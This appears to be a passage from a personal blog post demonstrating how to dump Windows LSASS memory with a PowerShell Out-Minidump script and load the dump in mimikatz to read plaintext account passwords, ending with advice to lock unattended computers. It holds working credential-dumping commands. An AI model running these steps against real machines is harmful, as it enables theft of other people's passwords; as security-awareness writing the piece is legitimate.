. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1' # "dot sourcing" method to import function from the script Get-Process lsass | Out-Minidump # To perform the LSASS dump Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground' # Copy the dump file to desired location
As you can see,
lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time we use the mimikatz terminal to load in the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Switching to MINIDUMP file, so now we can view the passwords. Now, run this command to display all the accounts and passwords available:
Tadaa… Now I can see my actual Microsoft Account username and password in a plain text. As you imagine, most of people nowadays are still using the same password for almost everything. Too bad.. So, I expected you can picture all the consequences with this vulnerability…
The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). And Windows stores encrypted user passwords in memory without using one-way hash which is decryptable using LsaUnprotectMemory function to a plain text.
You will be safe as long as you always lock your computer when you’re away. This short article is just to remind me or anyone else to always be careful in whatever we do especially with anything to do with our passwords and personal credential information. No system is perfect! So, DON’T EVER LEAVE YOUR COMPUTER UNLOCKED!